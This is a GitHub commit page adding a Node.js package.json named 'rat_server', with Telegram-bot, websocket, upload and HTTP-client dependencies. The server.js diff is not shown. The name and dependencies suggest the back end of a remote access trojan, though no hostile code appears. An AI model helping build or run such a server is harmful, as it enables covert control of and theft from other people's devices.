ADDED SERER FILES IN FOLDER

This commit is contained in:
shiva yadav 2022-08-22 23:22:43 -07:00 committed by GitHub
parent 4b54d7b2b3
commit 885e951ce6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 0 deletions

24
SERVER FILES/package.json Normal file
View File

@ -0,0 +1,24 @@
{
"name": "rat_server",
"version": "1.0.0",
"description": "",
"main": "index.js",
"engines": {
"node": "16.13.2"
},
"scripts": {
"start": "node server.js"
},
"keywords": [],
"author": "l",
"license": "ISC",
"dependencies": {
"body-parser": "^1.19.1",
"express": "latest",
"multer": "^1.4.4",
"node-telegram-bot-api": "latest",
"uuid": "^8.3.2",
"ws": "latest",
"axios": "^0.26.1"
}
}

14
SERVER FILES/server.js Normal file

File diff suppressed because one or more lines are too long